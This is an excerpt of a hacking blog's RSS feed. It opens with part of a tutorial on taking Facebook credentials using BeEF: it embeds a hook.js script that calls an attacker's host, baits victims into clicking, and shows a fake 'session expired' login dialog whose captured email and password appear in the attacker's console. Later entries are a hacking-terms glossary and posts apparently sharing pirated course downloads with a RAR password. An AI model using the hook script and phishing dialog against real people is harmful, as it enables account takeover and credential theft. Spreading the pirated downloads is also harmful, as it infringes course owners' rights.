&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgqPPXnreSs5HurJ4azvgGAY03AK1BWohcl_0LywcEqY1C4bItbsdOOoTGK-ZGkVi8jrexuWwuDbz8IZGi6E9nFjf5Z5N9ZizdRRyj13cpPR2AtZowfI9yc4GoVJUr9UD0oDBeP9OrudFhd/s1600/635965763531688571.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;379&quot; data-original-width=&quot;639&quot; height=&quot;189&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgqPPXnreSs5HurJ4azvgGAY03AK1BWohcl_0LywcEqY1C4bItbsdOOoTGK-ZGkVi8jrexuWwuDbz8IZGi6E9nFjf5Z5N9ZizdRRyj13cpPR2AtZowfI9yc4GoVJUr9UD0oDBeP9OrudFhd/s320/635965763531688571.jpg&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;b&gt;step 3&lt;/b&gt; -Hook the Victim&#39;s Browser&lt;br /&gt;
The simplest way is to simply embed the code into your website and entice the user to click on it. This might be done by such text as &quot;Click here for more information&quot; or &quot;Click here to see the video.&quot; Use your imagination.&lt;br /&gt;
The script looks something like below.&lt;br /&gt;
&amp;lt;script src= &quot;http://192.168.1.101:3000/hook.js&amp;amp;#8221 ; type= &quot;text/javascript&quot; &amp;gt;&amp;lt;/script&amp;gt;&lt;br /&gt;
&lt;br /&gt;
From here, I will be assuming you have &quot;hooked&quot; the victim&#39;s browser and are ready to own it.&lt;br /&gt;
&lt;b&gt;step 4&lt;/b&gt; - Send a Dialog Box to the User&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgzUwd-Kn1dZH5hm8jYef8nEga0gQIrnRpL7_47fgHy4fPZw5qj9fCAcK6vl4Z3DNtRTqas0kjLOqLQqpf5A8AbihXuDeh8bwKWubldL4cPhKKZ6DZZoj4KDvYO0n5lLAhBqgqKnc1qK_9L/s1600/635965768258721172.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;436&quot; data-original-width=&quot;661&quot; height=&quot;211&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgzUwd-Kn1dZH5hm8jYef8nEga0gQIrnRpL7_47fgHy4fPZw5qj9fCAcK6vl4Z3DNtRTqas0kjLOqLQqpf5A8AbihXuDeh8bwKWubldL4cPhKKZ6DZZoj4KDvYO0n5lLAhBqgqKnc1qK_9L/s320/635965768258721172.jpg&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Click on the &quot;Commands&quot; tab, then scroll down the &quot;Modules Tree&quot; until you come to &quot;Social Engineering&quot; and click to expand it. It will display numerous social engineering modules. Click on &quot;Pretty Theft,&quot; which will open a &quot;Module Results History&quot; and &quot;Pretty Theft&quot; window.&lt;br /&gt;
If we click on the &quot;Dialog Type&quot; box, we can see that this module can not only create a Facebook dialog box, but also a LinkedIn, Windows, YouTube, Yammer, and a generic dialog box. Select the Facebook dialog type,then click on the &quot;Execute&quot; button the the bottom.&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgVQgoOw5eVzp5E0wasUsG311BNPpevlxd54ZrIqB7shmtJFLMrCwSJrnSuItBDTnZqL_paWsRB1CWx_G6VF0imn9XRwAn5LYB30MoFzzr28ShfCPL_MYXOa6WEW9h7wjjnMS3bEDhbixPn/s1600/635965769429813973.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;402&quot; data-original-width=&quot;566&quot; height=&quot;227&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgVQgoOw5eVzp5E0wasUsG311BNPpevlxd54ZrIqB7shmtJFLMrCwSJrnSuItBDTnZqL_paWsRB1CWx_G6VF0imn9XRwAn5LYB30MoFzzr28ShfCPL_MYXOa6WEW9h7wjjnMS3bEDhbixPn/s320/635965769429813973.jpg&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
The Dialog Box Appears on the Target System&lt;br /&gt;
Although you may be suspicious of such a pop-up box, most users will trust that their Facebook session expired and will simply enter their email and password in.&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiYiZ1Y3uElVcNfqGs2xCOy8TQPHqNnCkvr0IVraze9DKBtv5upQ6r4IENuOuVBI2FChwlvtK12qZrIeMU7WoCqKu6tCnGgvFLbbEQXJkgde8LFVIlJbnYTUlnsyggOujreFJKmIM7k8vax/s1600/635965771726844975.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;223&quot; data-original-width=&quot;349&quot; height=&quot;204&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiYiZ1Y3uElVcNfqGs2xCOy8TQPHqNnCkvr0IVraze9DKBtv5upQ6r4IENuOuVBI2FChwlvtK12qZrIeMU7WoCqKu6tCnGgvFLbbEQXJkgde8LFVIlJbnYTUlnsyggOujreFJKmIM7k8vax/s320/635965771726844975.jpg&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;b&gt;step 5&lt;/b&gt; - Harvest the Credentials&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiaQnSmOf5UYcMnLGj63lJx_QiQqPo3eO3OVh9lMpweXeCe4cWaNDu94RMk7gw4YdSZFCOO-fPaJWNqiJJdacTVRU6p3GYx92cSXsw9fr7XgpukMoX7y-Cwo8kD-xlxvNqUolan4b5pYigV/s1600/635965773012313765.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;358&quot; data-original-width=&quot;590&quot; height=&quot;194&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiaQnSmOf5UYcMnLGj63lJx_QiQqPo3eO3OVh9lMpweXeCe4cWaNDu94RMk7gw4YdSZFCOO-fPaJWNqiJJdacTVRU6p3GYx92cSXsw9fr7XgpukMoX7y-Cwo8kD-xlxvNqUolan4b5pYigV/s320/635965773012313765.jpg&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Back on our system in the BeEf interface, we can see that the credentials appear in the &quot;Command results&quot; window. The victim has entered their email address &quot;loveofmylife@gmail.com&quot; and their password &quot;sweetbippy&quot; and they have been captured and presented to you in BeEF.&lt;br /&gt;
If you are really determined to get those Facebook credentials, it can be most definitely be done, and this is just one way of many methods (but probably the simplest).&lt;br /&gt;
&lt;br /&gt;</description><link>https://kryptonhackingworld.blogspot.com/2018/05/how-to-get-facebook-credentials-using.html</link><author>noreply@blogger.com (Anonymous)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh4BBpB4xACppQAHYRCx6edgfuhV1XGD3H2_hxM_ih3CaOIP9nNUdlHMX9S-n4wshMF9I7AiAgcqulefaA_3lhHBzbqt0Z8qp3KzIdXW5DGVzuAJ6aZSnW1UGMzVphDdclDYcHrjtOFL0Ne/s72-c/hack-like-pro-hack-web-browsers-with-beef.w1456.jpg" height="72" width="72"/></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-425675784276321914.post-7718853367985229867</guid><pubDate>Thu, 24 May 2018 10:41:00 +0000</pubDate><atom:updated>2018-05-24T04:31:32.357-07:00</atom:updated><title>Important terms in the field of HACKING - PART 2</title><description>&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjs-NY7-CFXjgnVqM6XXc3-Ks9oQ17pB6lvAogds6NpoVta4VAgxNttAT6VTI-QPMn9W7DStdTuxQPYA_c_M33SBgKhyphenhyphenBaGNsVkGCSXoRW6bXZlo-FffVPzJi3HAMh9oVg5TsqplpYenhAz/s1600/download.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;168&quot; data-original-width=&quot;300&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjs-NY7-CFXjgnVqM6XXc3-Ks9oQ17pB6lvAogds6NpoVta4VAgxNttAT6VTI-QPMn9W7DStdTuxQPYA_c_M33SBgKhyphenhyphenBaGNsVkGCSXoRW6bXZlo-FffVPzJi3HAMh9oVg5TsqplpYenhAz/s1600/download.jpg&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;br /&gt;
♻️ Rootkit − Rootkit is a stealthy type of software, typically malicious, designed to hide the existence of certain processes or programs from normal methods of detection and enable continued privileged access to a computer.&lt;br /&gt;
&lt;br /&gt;
♻️Shrink Wrap code − A Shrink Wrap code attack is an act of exploiting holes in unpatched or poorly configured software.&lt;br /&gt;
&lt;br /&gt;
♻️Social engineering − Social engineering implies deceiving someone with the purpose of acquiring sensitive and personal information, like credit card details or user names and passwords.&lt;br /&gt;
&lt;br /&gt;
♻️Spam − A Spam is simply an &lt;br /&gt;
&lt;a name=&#39;more&#39;&gt;&lt;/a&gt;unsolicited email, also known as junk email, sent to a large number of recipients without their consent.&lt;br /&gt;
&lt;br /&gt;
♻️Spoofing − Spoofing is a technique used to gain unauthorized access to computers, whereby the intruder sends messages to a computer with an IP address indicating that the message is coming from a trusted host.&lt;br /&gt;
&lt;br /&gt;
♻️Spyware − Spyware is software that aims to gather information about a person or organization without their knowledge and that may send such information to another entity without the consumer&#39;s consent, or that asserts control over a computer without the consumer&#39;s knowledge.&lt;br /&gt;
&lt;br /&gt;
♻️SQL Injection − SQL injection is an SQL code injection technique, used to attack data-driven applications, in which malicious SQL statements are inserted into an entry field for execution (e.g. to dump the database contents to the attacker).&lt;br /&gt;
&lt;br /&gt;
♻️Threat − A threat is a possible danger that can exploit an existing bug or vulnerability to compromise the security of a computer or network system.&lt;br /&gt;
&lt;br /&gt;
♻️Trojan − A Trojan, or Trojan Horse, is a malicious program disguised to look like a valid program, making it difficult to distinguish from programs that are supposed to be there designed with an intention to destroy files, alter information, steal passwords or other information.&lt;br /&gt;
&lt;br /&gt;
♻️Virus − A virus is a malicious program or a piece of code which is capable of copying itself and typically has a detrimental effect, such as corrupting the system or destroying data.&lt;br /&gt;
&lt;br /&gt;
♻️Vulnerability − A vulnerability is a weakness which allows a hacker to compromise the security of a computer or network system.&lt;br /&gt;
&lt;br /&gt;
♻️Worms − A worm is a self-replicating virus that does not alter files but resides in active memory and duplicates itself.&lt;br /&gt;
&lt;br /&gt;
♻️Cross-site Scripting − Cross-site scripting (XSS) is a type of computer security vulnerability typically found in web applications. XSS enables attackers to inject client-side script into web pages viewed by other users.&lt;br /&gt;
&lt;br /&gt;
♻️Zombie Drone − A Zombie Drone is defined as a hi-jacked computer that is being used anonymously as a soldier or &#39;drone&#39; for malicious activity, for example, distributing unwanted spam e-mails.</description><link>https://kryptonhackingworld.blogspot.com/2018/05/important-terms-in-field-of-hacking.html</link><author>noreply@blogger.com (Anonymous)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjs-NY7-CFXjgnVqM6XXc3-Ks9oQ17pB6lvAogds6NpoVta4VAgxNttAT6VTI-QPMn9W7DStdTuxQPYA_c_M33SBgKhyphenhyphenBaGNsVkGCSXoRW6bXZlo-FffVPzJi3HAMh9oVg5TsqplpYenhAz/s72-c/download.jpg" height="72" width="72"/></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-425675784276321914.post-162704805081885878</guid><pubDate>Thu, 24 May 2018 10:40:00 +0000</pubDate><atom:updated>2018-05-24T04:32:03.776-07:00</atom:updated><title>Important terms used in the field of HACKING - PART 1</title><description>&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiRinLgB7DetPMNO9bEZ7qXhsn6YaNIofTHo87mW5oq-M7BGhpSNTuDtvli6soWaiA35J6YDZCoohCz0rjdCSWpMotWedd3Tee_6uZBIzSxngoReKKWTy_dXbzB0CIWZkN6LpQwKuyliSKu/s1600/download.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;168&quot; data-original-width=&quot;300&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiRinLgB7DetPMNO9bEZ7qXhsn6YaNIofTHo87mW5oq-M7BGhpSNTuDtvli6soWaiA35J6YDZCoohCz0rjdCSWpMotWedd3Tee_6uZBIzSxngoReKKWTy_dXbzB0CIWZkN6LpQwKuyliSKu/s1600/download.jpg&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
‼️ Following is a list of important terms used in the field of hacking.&lt;br /&gt;
&lt;br /&gt;
♻️Adware − Adware is software designed to force pre-chosen ads to display on your system.&lt;br /&gt;
&lt;br /&gt;
♻️Attack − An attack is an action that is done on a system to get its access and extract sensitive data.&lt;br /&gt;
&lt;br /&gt;
♻️Back door − A back door, or trap door, is &lt;br /&gt;
&lt;a name=&#39;more&#39;&gt;&lt;/a&gt;a hidden entry to a computing device or software that bypasses security measures, such as logins and password protections.&lt;br /&gt;
&lt;br /&gt;
♻️Bot − A bot is a program that automates an action so that it can be done repeatedly at a much higher rate for a more sustained period than a human operator could do it. For example, sending HTTP, FTP or Telnet at a higher rate or calling script to create objects at a higher rate.&lt;br /&gt;
&lt;br /&gt;
♻️Botnet − A botnet, also known as zombie army, is a group of computers controlled without their owners’ knowledge. Botnets are used to send spam or make denial of service attacks.&lt;br /&gt;
&lt;br /&gt;
♻️Brute force attack − A brute force attack is an automated and the simplest kind of method to gain access to a system or website. It tries different combination of usernames and passwords, over and over again, until it gets in.&lt;br /&gt;
&lt;br /&gt;
♻️Buffer Overflow − Buffer Overflow is a flaw that occurs when more data is written to a block of memory, or buffer, than the buffer is allocated to hold.&lt;br /&gt;
&lt;br /&gt;
♻️Clone phishing − Clone phishing is the modification of an existing, legitimate email with a false link to trick the recipient into providing personal information.&lt;br /&gt;
&lt;br /&gt;
♻️Cracker − A cracker is one who modifies the software to access the features which are considered undesirable by the person cracking the software, especially copy protection features.&lt;br /&gt;
&lt;br /&gt;
♻️Denial of service attack (DoS) − A denial of service (DoS) attack is a malicious attempt to make a server or a network resource unavailable to users, usually by temporarily interrupting or suspending the services of a host connected to the Internet.&lt;br /&gt;
&lt;br /&gt;
♻️DDoS − Distributed denial of service attack.&lt;br /&gt;
&lt;br /&gt;
♻️Exploit Kit − An exploit kit is software system designed to run on web servers, with the purpose of identifying software vulnerabilities in client machines communicating with it and exploiting discovered vulnerabilities to upload and execute malicious code on the client.&lt;br /&gt;
&lt;br /&gt;
♻️Exploit − Exploit is a piece of software, a chunk of data, or a sequence of commands that takes advantage of a bug or vulnerability to compromise the security of a computer or network system.&lt;br /&gt;
&lt;br /&gt;
♻️Firewall − A firewall is a filter designed to keep unwanted intruders outside a computer system or network while allowing safe communication between systems and users on the inside of the firewall.&lt;br /&gt;
&lt;br /&gt;
♻️Keystroke logging − Keystroke logging is the process of tracking the keys which are pressed on a computer (and which touchscreen points are used). It is simply the map of a computer/human interface. It is used by gray and black hat hackers to record login IDs and passwords. Keyloggers are usually secreted onto a device using a Trojan delivered by a phishing email.&lt;br /&gt;
&lt;br /&gt;
♻️Logic bomb − A virus secreted into a system that triggers a malicious action when certain conditions are met. The most common version is the time bomb.&lt;br /&gt;
&lt;br /&gt;
♻️Malware − Malware is an umbrella term used to refer to a variety of forms of hostile or intrusive software, including computer viruses, worms, Trojan horses, ransomware, spyware, adware, scareware, and other malicious programs.&lt;br /&gt;
&lt;br /&gt;
♻️Master Program − A master program is the program a black hat hacker uses to remotely transmit commands to infected zombie drones, normally to carry out Denial of Service attacks or spam attacks.&lt;br /&gt;
&lt;br /&gt;
♻️Phishing − Phishing is an e-mail fraud method in which the perpetrator sends out legitimate-looking emails, in an attempt to gather personal and financial information from recipients.&lt;br /&gt;
&lt;br /&gt;
♻️Phreaker − Phreakers are considered the original computer hackers and they are those who break into the telephone network illegally, typically to make free longdistance phone calls or to tap phone lines.</description><link>https://kryptonhackingworld.blogspot.com/2018/05/important-terms-used-in-field-of.html</link><author>noreply@blogger.com (Anonymous)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiRinLgB7DetPMNO9bEZ7qXhsn6YaNIofTHo87mW5oq-M7BGhpSNTuDtvli6soWaiA35J6YDZCoohCz0rjdCSWpMotWedd3Tee_6uZBIzSxngoReKKWTy_dXbzB0CIWZkN6LpQwKuyliSKu/s72-c/download.jpg" height="72" width="72"/></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-425675784276321914.post-5174795189263451450</guid><pubDate>Thu, 24 May 2018 09:35:00 +0000</pubDate><atom:updated>2018-05-24T04:33:12.663-07:00</atom:updated><title>Artificial Intelligence Website Creation 2018 (No Coding)</title><description>&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhlK3ZyMR7aBnus_4oI4k-FbNHSwaLOv-ZntrzH_eQxo8zdW5RHyVJn5k5oy30jv7wzkYEZVymRyXKrk0YC0S2jsKZjirXUI1fGWwfBhn5SVOrYbJFiIm82JwjqhTsdrOx-ClzK67r2fD_l/s1600/images.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;168&quot; data-original-width=&quot;300&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhlK3ZyMR7aBnus_4oI4k-FbNHSwaLOv-ZntrzH_eQxo8zdW5RHyVJn5k5oy30jv7wzkYEZVymRyXKrk0YC0S2jsKZjirXUI1fGWwfBhn5SVOrYbJFiIm82JwjqhTsdrOx-ClzK67r2fD_l/s1600/images.jpg&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Artificial Intelligence Website Creation 2018 (No Coding)&lt;br /&gt;
&lt;br /&gt;
This course can change your life as a web developer or marketer. With no coding experience, you can create amazing looking websites and pave the path for unlimited designs and interchange content and play god.&lt;br /&gt;
&lt;br /&gt;
&lt;a name=&#39;more&#39;&gt;&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
Share to help us 😘&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;a href=&quot;https://goo.gl/FKXK7i&quot;&gt;https://goo.gl/FKXK7i&lt;/a&gt;</description><link>https://kryptonhackingworld.blogspot.com/2018/05/artificial-intelligence-website.html</link><author>noreply@blogger.com (Anonymous)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhlK3ZyMR7aBnus_4oI4k-FbNHSwaLOv-ZntrzH_eQxo8zdW5RHyVJn5k5oy30jv7wzkYEZVymRyXKrk0YC0S2jsKZjirXUI1fGWwfBhn5SVOrYbJFiIm82JwjqhTsdrOx-ClzK67r2fD_l/s72-c/images.jpg" height="72" width="72"/></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-425675784276321914.post-604400780681575563</guid><pubDate>Thu, 24 May 2018 09:33:00 +0000</pubDate><atom:updated>2018-05-24T04:34:18.760-07:00</atom:updated><title>Learn Dart Web Programming</title><description>&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhb_gmX7fVGwqaiN8SQsHuxxk3RVcl9TTJ0B-z82GxjDe-6mNXiPZ4KwdfehdDNoh_O8KB-ApKnhR8Bm9qHNVj-GOzAsq49EV-DtUTOFtTKI-UTM1SIOQSEoH1ESJ4ShATLHdD-smK-6ciA/s1600/download+%25281%2529.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;250&quot; data-original-width=&quot;202&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhb_gmX7fVGwqaiN8SQsHuxxk3RVcl9TTJ0B-z82GxjDe-6mNXiPZ4KwdfehdDNoh_O8KB-ApKnhR8Bm9qHNVj-GOzAsq49EV-DtUTOFtTKI-UTM1SIOQSEoH1ESJ4ShATLHdD-smK-6ciA/s1600/download+%25281%2529.jpg&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Learn Dart Web Programming&lt;br /&gt;
&lt;br /&gt;
#requested&lt;br /&gt;
&lt;br /&gt;
This course on Dart Web Programming&lt;br /&gt;
teaches the following topics:&lt;br /&gt;
&lt;br /&gt;
1)Fundamentals &lt;br /&gt;
&lt;a name=&#39;more&#39;&gt;&lt;/a&gt;of Web Applications&lt;br /&gt;
&lt;br /&gt;
2)Review of HTML&lt;br /&gt;
&lt;br /&gt;
3)The DOM&lt;br /&gt;
&lt;br /&gt;
4)Setting up WebStorm IDE&lt;br /&gt;
&lt;br /&gt;
5)Setting up Atom Editor&lt;br /&gt;
&lt;br /&gt;
6)Web App Structure Review in Atom&lt;br /&gt;
&lt;br /&gt;
7)Review of Elements&lt;br /&gt;
&lt;br /&gt;
8)Accessing Elements in HTML&lt;br /&gt;
&lt;br /&gt;
9)Element Methods&lt;br /&gt;
&lt;br /&gt;
10)Interacting with Elements&lt;br /&gt;
&lt;br /&gt;
11)Creating a BMI Calculator&lt;br /&gt;
&lt;br /&gt;
12)Editing the BMI Calculator&lt;br /&gt;
&lt;br /&gt;
13)Radio Buttons&lt;br /&gt;
&lt;br /&gt;
14)Using CSS&lt;br /&gt;
&lt;br /&gt;
15)Checkboxes, Methods, Keycodes&lt;br /&gt;
&lt;br /&gt;
16)Adding and Removing Elements&lt;br /&gt;
&lt;br /&gt;
17)One Event Listener, Drag and Drop, Moving Elements, DND Package, Stage Hand&lt;br /&gt;
&lt;br /&gt;
Share to help us 😘&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
https://goo.gl/Fpkarf</description><link>https://kryptonhackingworld.blogspot.com/2018/05/learn-dart-web-programming.html</link><author>noreply@blogger.com (Anonymous)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhb_gmX7fVGwqaiN8SQsHuxxk3RVcl9TTJ0B-z82GxjDe-6mNXiPZ4KwdfehdDNoh_O8KB-ApKnhR8Bm9qHNVj-GOzAsq49EV-DtUTOFtTKI-UTM1SIOQSEoH1ESJ4ShATLHdD-smK-6ciA/s72-c/download+%25281%2529.jpg" height="72" width="72"/></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-425675784276321914.post-6908993509359449216</guid><pubDate>Thu, 24 May 2018 09:31:00 +0000</pubDate><atom:updated>2018-05-24T04:35:10.593-07:00</atom:updated><title>R programming: Practical and Concise</title><description>&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiv1OZEw8Cm-pQTJLy70H0T3qWVjObtxAWTTe3iSmyWh649seTzLzIYY6Hv0jcGryHn706MjLvVHwvYxLq9NIPBwK3wOYhcr7PkCkedsL9zhnwmGmRo55l06M4uA0Bc0aNrn1w55vi1VU1n/s1600/download+%25282%2529.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;198&quot; data-original-width=&quot;255&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiv1OZEw8Cm-pQTJLy70H0T3qWVjObtxAWTTe3iSmyWh649seTzLzIYY6Hv0jcGryHn706MjLvVHwvYxLq9NIPBwK3wOYhcr7PkCkedsL9zhnwmGmRo55l06M4uA0Bc0aNrn1w55vi1VU1n/s1600/download+%25282%2529.jpg&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
R programming: Practical and Concise&lt;br /&gt;
&lt;br /&gt;
#requested&lt;br /&gt;
&lt;br /&gt;
📌 ENROLL FAST LIMITED TIME OFFER&lt;br /&gt;
&lt;br /&gt;
Learn the R p&lt;br /&gt;
&lt;a name=&#39;more&#39;&gt;&lt;/a&gt;rogramming language, the popular programming language used in Data Science, Statistics and Machine Learnin&lt;br /&gt;
&lt;br /&gt;
🔥 HIGHEST RATED 🔥&lt;br /&gt;
&lt;br /&gt;
Share to help us 😘&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;a href=&quot;https://goo.gl/43VjbU&quot;&gt;https://goo.gl/43VjbU&lt;/a&gt;</description><link>https://kryptonhackingworld.blogspot.com/2018/05/r-programming-practical-and-concise.html</link><author>noreply@blogger.com (Anonymous)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiv1OZEw8Cm-pQTJLy70H0T3qWVjObtxAWTTe3iSmyWh649seTzLzIYY6Hv0jcGryHn706MjLvVHwvYxLq9NIPBwK3wOYhcr7PkCkedsL9zhnwmGmRo55l06M4uA0Bc0aNrn1w55vi1VU1n/s72-c/download+%25282%2529.jpg" height="72" width="72"/></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-425675784276321914.post-8350876529416920711</guid><pubDate>Thu, 24 May 2018 09:12:00 +0000</pubDate><atom:updated>2018-05-24T04:38:01.031-07:00</atom:updated><title>(REQUESTED)Advanced Course Of Drop Shipping On The Internet</title><description>&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhcwHb_QzORJA4oHBXJXMxKaMBf9eSX1T7I-_AVh7ak35y_336uEObhWb9JprEFet5bBfl3gIufq23QmBP-pPWj_udmKEbOW2Uuuvv8OsQaZ3mKEO90RBOA2B3tx_zMLqiiZX39Ya2d4XRh/s1600/download+%25283%2529.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;168&quot; data-original-width=&quot;299&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhcwHb_QzORJA4oHBXJXMxKaMBf9eSX1T7I-_AVh7ak35y_336uEObhWb9JprEFet5bBfl3gIufq23QmBP-pPWj_udmKEbOW2Uuuvv8OsQaZ3mKEO90RBOA2B3tx_zMLqiiZX39Ya2d4XRh/s1600/download+%25283%2529.jpg&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Advanced Course Of Drop Shipping On The Internet&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
#Requested&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
What Will I Learn?&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Bring products to the&lt;br /&gt;
&lt;a name=&#39;more&#39;&gt;&lt;/a&gt;electronic stores properly&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Selection of appropriate varieties and appropriate to add the web-store&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Learn how to sell on Amazon and EBAY Stores properly through the Drop Shipping&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
File Info-RAR Password: Getfreetutorial.com&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Course Info:&lt;br /&gt;
&lt;br /&gt;
Tabel Of Content : Udemy&lt;br /&gt;
&lt;br /&gt;
MP4 | Video: AVC 1280×720 | Audio: AAC 44KHz 2ch | Duration: 1 Hours | Lec: 36 | 183 MB&lt;br /&gt;
&lt;br /&gt;
Genre: eLearning | Language: English&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
🔗Udemy link-&lt;br /&gt;
&lt;br /&gt;
&lt;a href=&quot;https://goo.gl/PqeufW&quot;&gt;https://goo.gl/PqeufW&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
🔗Gdrive link-&lt;br /&gt;
&lt;br /&gt;
